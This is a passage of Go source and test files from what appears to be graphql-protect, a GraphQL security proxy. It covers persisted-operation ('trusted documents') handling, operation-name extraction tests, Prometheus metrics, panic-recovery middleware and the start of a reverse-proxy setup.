match 40 | // match[1] is either mutation/query 41 | // match[2] is the name of the operation 42 | if len(match) == 3 { 43 | return match[2] 44 | } 45 | return "" 46 | } 47 | -------------------------------------------------------------------------------- /internal/business/trusteddocuments/model_test.go: -------------------------------------------------------------------------------- 1 | package trusteddocuments 2 | 3 | import ( 4 | "github.com/stretchr/testify/assert" 5 | "testing" 6 | ) 7 | 8 | func TestNewPersistedOperation(t *testing.T) { 9 | type args struct { 10 | operation string 11 | } 12 | tests := []struct { 13 | name string 14 | args args 15 | want string 16 | err error 17 | }{ 18 | { 19 | name: "extracts operation from query", 20 | args: args{ 21 | operation: "query ProductQuery{ product(id: 1) { id title as } }", 22 | }, 23 | want: "ProductQuery", 24 | }, 25 | { 26 | name: "extracts operation from mutation", 27 | args: args{ 28 | operation: "mutation ProductQuery{ product(id: 1) { id title as } }", 29 | }, 30 | want: "ProductQuery", 31 | }, 32 | { 33 | name: "no operation name when not present", 34 | args: args{ 35 | operation: "mutation { product(id: 1) { id title as } }", 36 | }, 37 | want: "", 38 | }, 39 | { 40 | name: "no operation name when no space between type and bracket", 41 | args: args{ 42 | operation: "mutation{ product(id: 1) { id title as } }", 43 | }, 44 | want: "", 45 | }, 46 | { 47 | name: "excludes operation arguments", 48 | args: args{ 49 | operation: "query Foobar($some: Int, $value: String){ product(id: 1) { id title as } }", 50 | }, 51 | want: "Foobar", 52 | }, 53 | { 54 | name: "no weird stuff when getting a completely malformed string", 55 | args: args{ 56 | operation: "", 57 | }, 58 | want: "", 59 | }, 60 | { 61 | name: "handles white space around operation name", 62 | args: args{ 63 | operation: "query Foobar ($some: Int, $value: String){ product(id: 1) { id title as } }", 64 | }, 65 | want: "Foobar", 66 | }, 67 | { 68 | 
name: "error is thrown on non parseable queries", 69 | args: args{ 70 | operation: "invalidQueryString", 71 | }, 72 | want: "", 73 | }, 74 | { 75 | name: "Can deal with fragments inside a query", 76 | args: args{ 77 | operation: "fragment BaseItem on MenuItem { action { menuItemActionType url } id imageUrl level measurement { clickedMenuItem } title } query MenuItems($country: String!, $id: String, $language: String!, $levels: String) { menuItems(country: $country, language: $language, id: $id, levels: $levels) { children { children { ...BaseItem } ...BaseItem } imageHeaderUrl level ...BaseItem } }", 78 | }, 79 | want: "MenuItems", 80 | }, 81 | } 82 | for _, tt := range tests { 83 | t.Run(tt.name, func(t *testing.T) { 84 | operation := extractOperationNameFromOperation(tt.args.operation) 85 | assert.Equalf(t, tt.want, operation, "newPersistedOperation(%v)", tt.args.operation) 86 | }) 87 | } 88 | } 89 | -------------------------------------------------------------------------------- /internal/business/trusteddocuments/nooploader.go: -------------------------------------------------------------------------------- 1 | package trusteddocuments 2 | 3 | import "context" 4 | 5 | var _ Loader = &NoOpLoader{} 6 | 7 | type NoOpLoader struct { 8 | } 9 | 10 | func (n *NoOpLoader) Type() string { 11 | return "noop" 12 | } 13 | 14 | func NewNoOpLoader() (*NoOpLoader, error) { 15 | return &NoOpLoader{}, nil 16 | } 17 | 18 | func (n *NoOpLoader) Load(_ context.Context) (map[string]PersistedOperation, error) { 19 | return nil, nil 20 | } 21 | -------------------------------------------------------------------------------- /internal/business/trusteddocuments/persisted_operations.go: -------------------------------------------------------------------------------- 1 | package trusteddocuments // nolint:revive 2 | 3 | import ( 4 | "bytes" 5 | "context" 6 | "encoding/json" 7 | "errors" 8 | "fmt" 9 | "github.com/supportivefe/graphql-protect/internal/business/gql" 10 | 
"github.com/supportivefe/graphql-protect/internal/business/validation" 11 | "github.com/prometheus/client_golang/prometheus" 12 | "github.com/vektah/gqlparser/v2/gqlerror" 13 | "io" 14 | "log/slog" 15 | "net/http" 16 | "sync" 17 | "time" 18 | ) 19 | 20 | var ( 21 | persistedOpsCounter = prometheus.NewCounterVec(prometheus.CounterOpts{ 22 | Namespace: "graphql_protect", 23 | Subsystem: "persisted_operations", 24 | Name: "result_count", 25 | Help: "The results of the persisted operations rule", 26 | }, 27 | []string{"state", "result"}, 28 | ) 29 | loadingResultCounter = prometheus.NewCounterVec(prometheus.CounterOpts{ 30 | Namespace: "graphql_protect", 31 | Subsystem: "persisted_operations", 32 | Name: "load_result_count", 33 | Help: "Counter tracking loading behavior and results", 34 | }, 35 | []string{"type", "result"}, 36 | ) 37 | uniqueHashesInMemGauge = prometheus.NewGaugeVec(prometheus.GaugeOpts{ 38 | Namespace: "graphql_protect", 39 | Subsystem: "persisted_operations", 40 | Name: "unique_hashes_in_memory_count", 41 | Help: "number of unique hashes in memory", 42 | }, []string{}, 43 | ) 44 | ) 45 | 46 | type ReloadFailureStrategy string 47 | 48 | var ReloadFailureStrategyIgnore ReloadFailureStrategy = "ignore-failure" 49 | var ReloadFailureStrategyReject ReloadFailureStrategy = "reject-on-failure" 50 | 51 | type ErrorPayload struct { 52 | Errors gqlerror.List `json:"errors"` 53 | } 54 | 55 | type ErrorMessage struct { 56 | Message string `json:"message"` 57 | } 58 | 59 | type Config struct { 60 | Enabled bool `yaml:"enabled"` 61 | EnableDebugEndpoint bool `yaml:"enable_debug_endpoint"` 62 | RejectOnFailure bool `yaml:"reject_on_failure"` 63 | Loader LoaderConfig `yaml:"loader"` 64 | } 65 | 66 | func DefaultConfig() Config { 67 | return Config{ 68 | Enabled: false, 69 | RejectOnFailure: true, 70 | Loader: LoaderConfig{ 71 | Type: "local", 72 | Location: "./store", 73 | Reload: struct { 74 | Enabled bool `yaml:"enabled"` 75 | Interval time.Duration 
`yaml:"interval"` 76 | Timeout time.Duration `yaml:"timeout"` 77 | }(struct { 78 | Enabled bool 79 | Interval time.Duration 80 | Timeout time.Duration 81 | }{ 82 | Enabled: true, 83 | Interval: 5 * time.Minute, 84 | Timeout: 10 * time.Second, 85 | }), 86 | }, 87 | } 88 | } 89 | 90 | type LoaderConfig struct { 91 | Type string `yaml:"type"` 92 | Location string `yaml:"location"` 93 | // Configuration for auto-reloading persisted operations 94 | Reload struct { 95 | Enabled bool `yaml:"enabled"` 96 | Interval time.Duration `yaml:"interval"` 97 | Timeout time.Duration `yaml:"timeout"` 98 | } 99 | } 100 | 101 | var ErrNoLoaderSupplied = errors.New("no remoteLoader supplied") 102 | var ErrNoHashFound = errors.New("no hash found") 103 | var ErrPersistedQueryNotFound = errors.New("PersistedQueryNotFound") 104 | var ErrPersistedOperationNotFound = errors.New("PersistedOperationNotFound") 105 | var ErrReloadIntervalTooShort = errors.New("load interval cannot be less than 10 seconds") 106 | 107 | type Handler struct { 108 | log *slog.Logger 109 | cfg Config 110 | // this has the opportunity to grow indefinitely, might wat to replace with a fixed-cap cache 111 | // or something like an LRU with a TTL 112 | cache map[string]PersistedOperation 113 | refreshTicker *time.Ticker 114 | refreshLock sync.Mutex 115 | 116 | loader Loader 117 | done chan bool 118 | lock sync.RWMutex 119 | } 120 | 121 | func init() { 122 | prometheus.MustRegister(persistedOpsCounter, loadingResultCounter, uniqueHashesInMemGauge) 123 | } 124 | 125 | func NewPersistedOperations(log *slog.Logger, cfg Config, loader Loader) (*Handler, error) { 126 | if loader == nil { 127 | return nil, ErrNoLoaderSupplied 128 | } 129 | 130 | if cfg.Loader.Reload.Enabled && cfg.Loader.Reload.Interval < 10*time.Second { 131 | return nil, ErrReloadIntervalTooShort 132 | } 133 | 134 | refreshTicker := func() *time.Ticker { 135 | if !cfg.Loader.Reload.Enabled { 136 | return nil 137 | } 138 | return 
time.NewTicker(cfg.Loader.Reload.Interval) 139 | }() 140 | // buffered in case we don't have reloading enabled 141 | done := make(chan bool, 1) 142 | 143 | poh := &Handler{ 144 | log: log, 145 | cfg: cfg, 146 | cache: map[string]PersistedOperation{}, 147 | loader: loader, 148 | refreshTicker: refreshTicker, 149 | done: done, 150 | lock: sync.RWMutex{}, 151 | refreshLock: sync.Mutex{}, 152 | } 153 | 154 | err := poh.load(ReloadFailureStrategyIgnore) 155 | if err != nil { 156 | return nil, err 157 | } 158 | 159 | poh.reloadProcessor() 160 | 161 | return poh, nil 162 | } 163 | 164 | // SwapHashForQuery runs of the persisted operations handler 165 | // it uses the configuration supplied to decide its behavior 166 | func (p *Handler) SwapHashForQuery(next http.Handler) http.Handler { // nolint:funlen,cyclop 167 | fn := func(w http.ResponseWriter, r *http.Request) { 168 | if !p.cfg.Enabled || r.Method != "POST" { 169 | next.ServeHTTP(w, r) 170 | return 171 | } 172 | 173 | var errs gqlerror.List 174 | 175 | payload, err := gql.ParseRequestPayload(r) 176 | if err != nil { 177 | p.log.Warn("error decoding payload", "err", err) 178 | next.ServeHTTP(w, r) 179 | return 180 | } 181 | 182 | for i, data := range payload { 183 | if !p.cfg.RejectOnFailure && data.Query != "" { 184 | persistedOpsCounter.WithLabelValues("unknown", "allowed").Inc() 185 | continue 186 | } 187 | 188 | hash, err := hashFromPayload(data) 189 | if err != nil { 190 | persistedOpsCounter.WithLabelValues("error", "rejected").Inc() 191 | errs = append(errs, gqlerror.Wrap(ErrPersistedQueryNotFound)) 192 | continue 193 | } 194 | 195 | p.lock.RLock() 196 | operation, ok := p.cache[hash] 197 | p.lock.RUnlock() 198 | 199 | if !ok { 200 | // hash not found, fail 201 | persistedOpsCounter.WithLabelValues("unknown", "rejected").Inc() 202 | errs = append(errs, gqlerror.Wrap(ErrPersistedOperationNotFound)) 203 | continue 204 | } 205 | 206 | // update the original data 207 | payload[i].Query = operation.Operation 208 | 
payload[i].Extensions.PersistedQuery = nil 209 | payload[i].OperationName = operation.Name 210 | 211 | persistedOpsCounter.WithLabelValues("known", "allowed").Inc() 212 | } 213 | 214 | if len(errs) > 0 { 215 | // if any error occurred we fail 216 | res, _ := json.Marshal(ErrorPayload{ 217 | Errors: errs, 218 | }) 219 | http.Error(w, string(res), 200) 220 | return 221 | } 222 | 223 | var bts []byte 224 | // forward batched request 225 | if len(payload) > 1 { 226 | bts, err = json.Marshal(payload) 227 | if err != nil { 228 | // handle 229 | next.ServeHTTP(w, r) 230 | return 231 | } 232 | } else if len(payload) == 1 { 233 | // forward regular request 234 | bts, err = json.Marshal(payload[0]) 235 | if err != nil { 236 | // handle 237 | next.ServeHTTP(w, r) 238 | return 239 | } 240 | } 241 | 242 | // overwrite request body with new payload 243 | r.Body = io.NopCloser(bytes.NewBuffer(bts)) 244 | r.ContentLength = int64(len(bts)) 245 | 246 | next.ServeHTTP(w, r) 247 | } 248 | return http.HandlerFunc(fn) 249 | } 250 | 251 | func (p *Handler) GetTrustedDocuments() map[string]PersistedOperation { 252 | return p.cache 253 | } 254 | 255 | func (p *Handler) Validate(validate func(operation string) gqlerror.List) []validation.Error { 256 | var errs []validation.Error 257 | for hash, operation := range p.cache { 258 | err := validate(operation.Operation) 259 | 260 | if len(err) > 0 { 261 | valErr := validation.Wrap(err) 262 | valErr.Hash = hash 263 | errs = append(errs, valErr) 264 | } 265 | } 266 | 267 | return errs 268 | } 269 | 270 | func (p *Handler) load(failureStrategy ReloadFailureStrategy) error { 271 | newState, err := p.loader.Load(context.Background()) 272 | if err != nil { 273 | p.log.Error("error loading persisted operations", "err", err) 274 | loadingResultCounter.WithLabelValues(p.loader.Type(), "failure").Inc() 275 | if failureStrategy == ReloadFailureStrategyReject { 276 | return err 277 | } 278 | // implicit fall through for other failure types 279 | } 280 | 281 
| p.lock.Lock() 282 | p.cache = newState 283 | p.lock.Unlock() 284 | 285 | p.log.Info(fmt.Sprintf("Total number of unique operation hashes: %d", len(newState))) 286 | uniqueHashesInMemGauge.WithLabelValues().Set(float64(len(newState))) 287 | 288 | loadingResultCounter.WithLabelValues(p.loader.Type(), "success").Inc() 289 | 290 | return nil 291 | } 292 | 293 | func (p *Handler) reloadProcessor() { 294 | if !p.cfg.Loader.Reload.Enabled { 295 | return 296 | } 297 | 298 | go func() { 299 | for { 300 | select { 301 | case <-p.done: 302 | return 303 | case <-p.refreshTicker.C: 304 | if !p.refreshLock.TryLock() { 305 | p.log.Warn("Refresh ticker still running while next tick") 306 | continue 307 | } 308 | err := p.load(ReloadFailureStrategyReject) 309 | p.refreshLock.Unlock() 310 | if err != nil { 311 | continue 312 | } 313 | } 314 | } 315 | }() 316 | } 317 | 318 | func (p *Handler) Shutdown() { 319 | p.done <- true 320 | } 321 | 322 | func hashFromPayload(payload gql.RequestData) (string, error) { 323 | if payload.Extensions.PersistedQuery == nil { 324 | return "", ErrNoHashFound 325 | } 326 | 327 | hash := payload.Extensions.PersistedQuery.Sha256Hash 328 | if hash == "" { 329 | return "", ErrNoHashFound 330 | } 331 | 332 | return hash, nil 333 | } 334 | -------------------------------------------------------------------------------- /internal/business/trusteddocuments/persisted_operations_test.go: -------------------------------------------------------------------------------- 1 | package trusteddocuments // nolint:revive 2 | 3 | import ( 4 | "bytes" 5 | "context" 6 | "encoding/json" 7 | "errors" 8 | "github.com/supportivefe/graphql-protect/internal/business/gql" 9 | "github.com/stretchr/testify/assert" 10 | "io" 11 | "log/slog" 12 | "net/http" 13 | "net/http/httptest" 14 | "testing" 15 | ) 16 | 17 | func TestNewPersistedOperations(t *testing.T) { 18 | type args struct { 19 | cfg Config 20 | payload []byte 21 | cache map[string]PersistedOperation 22 | } 23 | tests := 
[]struct { 24 | name string 25 | args args 26 | want func(t *testing.T) http.Handler 27 | resWant func(t *testing.T, res *http.Response) 28 | }{ 29 | { 30 | name: "does nothing if middleware is disabled", 31 | args: args{ 32 | cfg: Config{ 33 | Enabled: false, 34 | }, 35 | }, 36 | want: func(_ *testing.T) http.Handler { 37 | fn := func(_ http.ResponseWriter, _ *http.Request) { 38 | } 39 | return http.HandlerFunc(fn) 40 | }, 41 | resWant: func(_ *testing.T, _ *http.Response) { 42 | 43 | }, 44 | }, 45 | { 46 | name: "Allows unpersisted requests if configured", 47 | args: args{ 48 | cfg: Config{ 49 | Enabled: true, 50 | RejectOnFailure: true, 51 | }, 52 | payload: func() []byte { 53 | data := gql.RequestData{ 54 | Query: "query { foo }", 55 | } 56 | bts, _ := json.Marshal(data) 57 | return bts 58 | }(), 59 | }, 60 | want: func(t *testing.T) http.Handler { 61 | fn := func(_ http.ResponseWriter, r *http.Request) { 62 | decoder := json.NewDecoder(r.Body) 63 | 64 | var payload gql.RequestData 65 | err := decoder.Decode(&payload) 66 | assert.NoError(t, err) 67 | 68 | assert.Equal(t, "query { foo }", payload.Query) 69 | } 70 | return http.HandlerFunc(fn) 71 | }, 72 | resWant: func(t *testing.T, res *http.Response) { 73 | assert.Equal(t, 200, res.StatusCode) 74 | }, 75 | }, 76 | { 77 | name: "Returns error if no hash match is found and unpersisted operations are not allowed", 78 | args: args{ 79 | cfg: Config{ 80 | Enabled: true, 81 | RejectOnFailure: false, 82 | }, 83 | payload: func() []byte { 84 | data := gql.RequestData{ 85 | Extensions: gql.Extensions{ 86 | PersistedQuery: &gql.PersistedQuery{ 87 | Sha256Hash: "foobar", 88 | }, 89 | }, 90 | } 91 | bts, _ := json.Marshal(data) 92 | return bts 93 | }(), 94 | 95 | cache: map[string]PersistedOperation{}, 96 | }, 97 | want: func(_ *testing.T) http.Handler { 98 | fn := func(_ http.ResponseWriter, _ *http.Request) { 99 | 100 | } 101 | return http.HandlerFunc(fn) 102 | }, 103 | resWant: func(t *testing.T, res *http.Response) { 
104 | assert.Equal(t, 200, res.StatusCode) 105 | 106 | decoder := json.NewDecoder(res.Body) 107 | 108 | var payload ErrorPayload 109 | err := decoder.Decode(&payload) 110 | assert.NoError(t, err) 111 | 112 | assert.Equal(t, "PersistedOperationNotFound", payload.Errors[0].Message) 113 | }, 114 | }, 115 | { 116 | name: "Swaps in query payload if hash operation is known, updates content length accordingly", 117 | args: args{ 118 | cfg: Config{ 119 | Enabled: true, 120 | RejectOnFailure: false, 121 | }, 122 | payload: func() []byte { 123 | data := gql.RequestData{ 124 | Extensions: gql.Extensions{ 125 | PersistedQuery: &gql.PersistedQuery{ 126 | Sha256Hash: "foobar", 127 | }, 128 | }, 129 | } 130 | bts, _ := json.Marshal(data) 131 | return bts 132 | }(), 133 | cache: map[string]PersistedOperation{ 134 | "foobar": newPersistedOperation("query { foobar }"), 135 | }, 136 | }, 137 | want: func(t *testing.T) http.Handler { 138 | fn := func(_ http.ResponseWriter, r *http.Request) { 139 | decoder := json.NewDecoder(r.Body) 140 | 141 | var payload gql.RequestData 142 | err := decoder.Decode(&payload) 143 | assert.NoError(t, err) 144 | 145 | assert.Equal(t, "query { foobar }", payload.Query) 146 | assert.Equal(t, int64(44), r.ContentLength) 147 | 148 | length, _ := json.Marshal(payload) 149 | 150 | assert.Equal(t, 44, len(length)) 151 | } 152 | return http.HandlerFunc(fn) 153 | }, 154 | resWant: func(t *testing.T, res *http.Response) { 155 | assert.Equal(t, 200, res.StatusCode) 156 | }, 157 | }, 158 | { 159 | name: "Swaps in batched query payload if hash operation is known, updates content length accordingly", 160 | args: args{ 161 | cfg: Config{ 162 | Enabled: true, 163 | RejectOnFailure: false, 164 | }, 165 | payload: func() []byte { 166 | data := []gql.RequestData{ 167 | { 168 | Extensions: gql.Extensions{ 169 | PersistedQuery: &gql.PersistedQuery{ 170 | Sha256Hash: "foobar", 171 | }, 172 | }, 173 | }, 174 | { 175 | Extensions: gql.Extensions{ 176 | PersistedQuery: 
&gql.PersistedQuery{ 177 | Sha256Hash: "baz", 178 | }, 179 | }, 180 | }, 181 | } 182 | bts, _ := json.Marshal(data) 183 | return bts 184 | }(), 185 | cache: map[string]PersistedOperation{ 186 | "foobar": newPersistedOperation("query { foobar }"), 187 | "baz": newPersistedOperation("query { baz }"), 188 | }, 189 | }, 190 | want: func(t *testing.T) http.Handler { 191 | fn := func(_ http.ResponseWriter, r *http.Request) { 192 | payload, err := io.ReadAll(r.Body) 193 | assert.NoError(t, err) 194 | 195 | assert.Equal(t, `[{"query":"query { foobar }","extensions":{}},{"query":"query { baz }","extensions":{}}]`, string(payload)) 196 | assert.Equal(t, int64(len(payload)), r.ContentLength) 197 | } 198 | return http.HandlerFunc(fn) 199 | }, 200 | resWant: func(t *testing.T, res *http.Response) { 201 | assert.Equal(t, 200, res.StatusCode) 202 | }, 203 | }, 204 | { 205 | name: "fails entire batch if one operation is unknown", 206 | args: args{ 207 | cfg: Config{ 208 | Enabled: true, 209 | RejectOnFailure: false, 210 | }, 211 | payload: func() []byte { 212 | data := []gql.RequestData{ 213 | { 214 | Extensions: gql.Extensions{ 215 | PersistedQuery: &gql.PersistedQuery{ 216 | Sha256Hash: "foobar", 217 | }, 218 | }, 219 | }, 220 | { 221 | Extensions: gql.Extensions{ 222 | PersistedQuery: &gql.PersistedQuery{ 223 | Sha256Hash: "baz", 224 | }, 225 | }, 226 | }, 227 | } 228 | bts, _ := json.Marshal(data) 229 | return bts 230 | }(), 231 | cache: map[string]PersistedOperation{ 232 | "foobar": newPersistedOperation("query { foobar }")}, 233 | }, 234 | want: func(t *testing.T) http.Handler { 235 | fn := func(_ http.ResponseWriter, _ *http.Request) { 236 | assert.Fail(t, "should not reach here") 237 | } 238 | return http.HandlerFunc(fn) 239 | }, 240 | resWant: func(t *testing.T, res *http.Response) { 241 | assert.Equal(t, 200, res.StatusCode) 242 | payload, err := io.ReadAll(res.Body) 243 | assert.NoError(t, err) 244 | assert.Equal(t, 
"{\"errors\":[{\"message\":\"PersistedOperationNotFound\"}]}\n", string(payload)) 245 | }, 246 | }, 247 | } 248 | for _, tt := range tests { 249 | t.Run(tt.name, func(t *testing.T) { 250 | log := slog.Default() 251 | po, _ := NewPersistedOperations(log, tt.args.cfg, newMemoryLoader(tt.args.cache)) 252 | po.cache = tt.args.cache 253 | 254 | req := httptest.NewRequest("POST", "/", bytes.NewBuffer(tt.args.payload)) 255 | resp := httptest.NewRecorder() 256 | 257 | po.SwapHashForQuery(tt.want(t)).ServeHTTP(resp, req) 258 | res := resp.Result() 259 | defer res.Body.Close() 260 | 261 | tt.resWant(t, res) 262 | }) 263 | } 264 | } 265 | 266 | func TestLoader(t *testing.T) { 267 | type args struct { 268 | state map[string]PersistedOperation 269 | loader Loader 270 | failureStrategy ReloadFailureStrategy 271 | } 272 | tests := []struct { 273 | name string 274 | args args 275 | want map[string]PersistedOperation 276 | wantErr error 277 | }{ 278 | { 279 | name: "loader state is added to cache", 280 | args: args{ 281 | loader: func() Loader { 282 | data := map[string]PersistedOperation{} 283 | data["123"] = PersistedOperation{ 284 | Operation: "i am an operation", 285 | Name: "i am a name", 286 | } 287 | 288 | loader := newMemoryLoader(data) 289 | 290 | return loader 291 | }(), 292 | state: map[string]PersistedOperation{}, 293 | failureStrategy: ReloadFailureStrategyReject, 294 | }, 295 | want: map[string]PersistedOperation{ 296 | "123": { 297 | Operation: "i am an operation", 298 | Name: "i am a name", 299 | }, 300 | }, 301 | wantErr: nil, 302 | }, 303 | { 304 | name: "loader state overwrites cache, does not append", 305 | args: args{ 306 | loader: func() Loader { 307 | data := map[string]PersistedOperation{} 308 | data["123"] = PersistedOperation{ 309 | Operation: "i am an operation", 310 | Name: "i am a name", 311 | } 312 | 313 | loader := newMemoryLoader(data) 314 | 315 | return loader 316 | }(), 317 | state: map[string]PersistedOperation{ 318 | "456": { 319 | Operation: "i 
am an operation that does get deleted", 320 | Name: "i am a name that doest get deleted", 321 | }, 322 | }, 323 | failureStrategy: ReloadFailureStrategyReject, 324 | }, 325 | want: map[string]PersistedOperation{ 326 | "123": { 327 | Operation: "i am an operation", 328 | Name: "i am a name", 329 | }, 330 | }, 331 | wantErr: nil, 332 | }, 333 | { 334 | name: "loader error does not update cache with failure mode reject", 335 | args: args{ 336 | loader: func() Loader { 337 | loader := &testLoader{ 338 | err: errors.New("this is unexpected"), 339 | willReturnError: false, 340 | } 341 | 342 | return loader 343 | }(), 344 | state: map[string]PersistedOperation{ 345 | "456": { 346 | Operation: "i am an operation that does not get deleted", 347 | Name: "i am a name that doest not get deleted", 348 | }, 349 | }, 350 | failureStrategy: ReloadFailureStrategyReject, 351 | }, 352 | want: map[string]PersistedOperation{ 353 | "456": { 354 | Operation: "i am an operation that does not get deleted", 355 | Name: "i am a name that doest not get deleted", 356 | }, 357 | }, 358 | wantErr: errors.New("this is unexpected"), 359 | }, 360 | { 361 | name: "loader error does update cache with failure mode ignore", 362 | args: args{ 363 | loader: func() Loader { 364 | loader := &testLoader{ 365 | err: errors.New("this is unexpected"), 366 | data: map[string]PersistedOperation{ 367 | "123": { 368 | Operation: "i am an operation", 369 | Name: "i am a name", 370 | }, 371 | }, 372 | willReturnError: false, 373 | } 374 | 375 | return loader 376 | }(), 377 | state: map[string]PersistedOperation{ 378 | "456": { 379 | Operation: "i am an operation that does not get deleted", 380 | Name: "i am a name that doest not get deleted", 381 | }, 382 | }, 383 | failureStrategy: ReloadFailureStrategyIgnore, 384 | }, 385 | want: map[string]PersistedOperation{ 386 | "123": { 387 | Operation: "i am an operation", 388 | Name: "i am a name", 389 | }, 390 | }, 391 | wantErr: errors.New("this is unexpected"), 392 | }, 
393 | } 394 | for _, tt := range tests { 395 | t.Run(tt.name, func(t *testing.T) { 396 | log := slog.Default() 397 | po, _ := NewPersistedOperations(log, Config{}, tt.args.loader) 398 | po.cache = tt.args.state 399 | 400 | err := po.load(tt.args.failureStrategy) 401 | if tt.wantErr != nil { 402 | assert.Error(t, tt.wantErr, err) 403 | } 404 | 405 | assert.Equal(t, tt.want, po.cache) 406 | }) 407 | } 408 | } 409 | 410 | var _ Loader = &testLoader{} 411 | 412 | // ErrorLoader is a loader for testing purposes 413 | type testLoader struct { 414 | data map[string]PersistedOperation 415 | err error 416 | willReturnError bool 417 | } 418 | 419 | func (e *testLoader) Type() string { 420 | return "error" 421 | } 422 | 423 | func newPersistedOperation(query string) PersistedOperation { 424 | return PersistedOperation{query, extractOperationNameFromOperation(query)} 425 | } 426 | 427 | func (e *testLoader) Load(_ context.Context) (map[string]PersistedOperation, error) { 428 | if e.willReturnError { 429 | return e.data, e.err 430 | } 431 | // return error after the first call 432 | e.willReturnError = true 433 | 434 | return e.data, nil 435 | } 436 | -------------------------------------------------------------------------------- /internal/business/validation/model.go: -------------------------------------------------------------------------------- 1 | package validation 2 | 3 | import ( 4 | "github.com/vektah/gqlparser/v2/gqlerror" 5 | ) 6 | 7 | type Error struct { 8 | Hash string `json:"-"` 9 | Err gqlerror.Error `json:"-"` 10 | } 11 | 12 | func (v Error) Error() string { 13 | if v.Hash != "" { 14 | return "Error validating hash [" + v.Hash + "]: " + v.Err.Error() 15 | } 16 | return v.Err.Message 17 | } 18 | 19 | func Wrap(err error) Error { 20 | return Error{ 21 | Err: *gqlerror.Wrap(err), 22 | } 23 | } 24 | -------------------------------------------------------------------------------- /internal/http/debug/debugging.go: 
-------------------------------------------------------------------------------- 1 | package debug 2 | 3 | import ( 4 | "encoding/json" 5 | "github.com/supportivefe/graphql-protect/internal/business/trusteddocuments" 6 | "net/http" 7 | ) 8 | 9 | func NewTrustedDocumentsDebugger(po *trusteddocuments.Handler, enableDebugEndpoint bool) http.HandlerFunc { 10 | return func(w http.ResponseWriter, _ *http.Request) { 11 | if !enableDebugEndpoint { 12 | w.WriteHeader(http.StatusNotFound) 13 | } else { 14 | trustedDocuments := po.GetTrustedDocuments() 15 | 16 | jsonData, err := json.MarshalIndent(trustedDocuments, "", " ") 17 | if err != nil { 18 | return 19 | } 20 | 21 | w.Header().Set("Content-Type", "application/json") 22 | w.WriteHeader(http.StatusOK) 23 | 24 | _, _ = w.Write(jsonData) 25 | } 26 | } 27 | } 28 | -------------------------------------------------------------------------------- /internal/http/middleware/metrics.go: -------------------------------------------------------------------------------- 1 | package middleware 2 | 3 | import ( 4 | "github.com/prometheus/client_golang/prometheus" 5 | "net/http" 6 | "time" 7 | ) 8 | 9 | var ( 10 | httpDuration = prometheus.NewHistogramVec(prometheus.HistogramOpts{ 11 | Namespace: "graphql_protect", 12 | Subsystem: "http", 13 | Name: "duration", 14 | Help: "HTTP duration", 15 | }, 16 | []string{"route"}, 17 | ) 18 | ) 19 | 20 | func init() { 21 | prometheus.MustRegister(httpDuration) 22 | } 23 | 24 | func RequestMetricMiddleware() func(next http.Handler) http.Handler { 25 | return func(next http.Handler) http.Handler { 26 | fn := func(w http.ResponseWriter, r *http.Request) { 27 | start := time.Now() 28 | 29 | next.ServeHTTP(w, r) 30 | 31 | httpDuration.WithLabelValues(r.URL.Path).Observe(time.Since(start).Seconds()) 32 | } 33 | return http.HandlerFunc(fn) 34 | } 35 | } 36 | -------------------------------------------------------------------------------- /internal/http/middleware/recover.go: 
-------------------------------------------------------------------------------- 1 | package middleware 2 | 3 | import ( 4 | "github.com/prometheus/client_golang/prometheus" 5 | "log/slog" 6 | "net/http" 7 | "runtime/debug" 8 | ) 9 | 10 | var recoverCounter = prometheus.NewCounterVec(prometheus.CounterOpts{ 11 | Namespace: "graphql_protect", 12 | Subsystem: "recover", 13 | Name: "count", 14 | Help: "Amount of times the middleware recovered a panic", 15 | }, 16 | []string{"error"}, 17 | ) 18 | 19 | func init() { 20 | prometheus.MustRegister(recoverCounter) 21 | } 22 | 23 | func Recover(log *slog.Logger) func(next http.Handler) http.Handler { 24 | return func(next http.Handler) http.Handler { 25 | fn := func(w http.ResponseWriter, r *http.Request) { 26 | defer func() { 27 | err := recover() 28 | // we don't recover http.ErrAbortHandler so the response to the client is aborted, this should not be logged 29 | if err == http.ErrAbortHandler { // nolint:errorlint 30 | panic(err) 31 | } 32 | if err != nil { 33 | recoverCounter.WithLabelValues(getErrNameFromAny(err)).Inc() 34 | log.Error("Panic during handling of request", "error", err, "method", r.Method, "path", r.URL.Path, "stacktrace", string(debug.Stack())) 35 | } 36 | }() 37 | 38 | next.ServeHTTP(w, r) 39 | } 40 | return http.HandlerFunc(fn) 41 | } 42 | } 43 | 44 | func getErrNameFromAny(err any) string { 45 | switch val := err.(type) { 46 | case error: 47 | return val.Error() 48 | default: 49 | return "unknown" 50 | } 51 | } 52 | -------------------------------------------------------------------------------- /internal/http/proxy/proxy.go: -------------------------------------------------------------------------------- 1 | package proxy 2 | 3 | import ( 4 | "bytes" 5 | "encoding/json" 6 | "github.com/supportivefe/graphql-protect/internal/business/rules/block_field_suggestions" 7 | "github.com/supportivefe/graphql-protect/internal/business/rules/obfuscate_upstream_errors" 8 | "io" 9 | "log/slog" 10 | "net/http" 11 | 
"net/http/httputil" 12 | "net/url" 13 | "strconv" 14 | "time" 15 | ) 16 | 17 | type Config struct { 18 | Timeout time.Duration `yaml:"timeout"` 19 | KeepAlive time.Duration `yaml:"keep_alive"` 20 | Host string `yaml:"host"` 21 | Tracing TracingConfig `yaml:"tracing"` 22 | } 23 | 24 | func DefaultConfig() Config { 25 | return Config{ 26 | Timeout: 10 * time.Second, 27 | KeepAlive: 3 * time.Minute, 28 | Host: "http://localhost:8081", 29 | Tracing: TracingConfig{ 30 | RedactedHeaders: nil, 31 | }, 32 | } 33 | } 34 | 35 | type TracingConfig struct { 36 | RedactedHeaders []string `yaml:"redacted_headers"` 37 | } 38 | 39 | func NewProxy(cfg Config, blockFieldSuggestions *block_field_suggestions.BlockFieldSuggestionsHandler, obfuscateUpstreamErrors *obfuscate_upstream_errors.ObfuscateUpstreamErrors, logGraphqlErrors bool, log *slog.Logger) (*httputil.ReverseProxy, error) { 40 | target, err := url.Parse(cfg.Host) 41 | if err != nil { 42 | return nil, err 43 | } 44 | proxy := &httputil.ReverseProxy{ 45 | Rewrite: func(r *httputil.ProxyRequest) { 46 | r.Out.Header["X-Forwarded-For"] = r.In.Header["X-Forwarded-For"] 47 | r.Out.Header.Del("Accept-Encoding") // Disabled as compression has no direct benefit for us within our cloud setup, this can be removed if proper parsing for all types of compression is implemented 48 | r.SetXForwarded() 49 | r.SetURL(target) 50 | r.Out.Host = r.In.Host 51 | }, 52 | Transport: NewTransport(cfg), 53 | ModifyResponse: modifyResponse(blockFieldSuggestions, obfuscateUpstreamErrors, logGraphqlErrors, log), // nolint:bodyclose 54 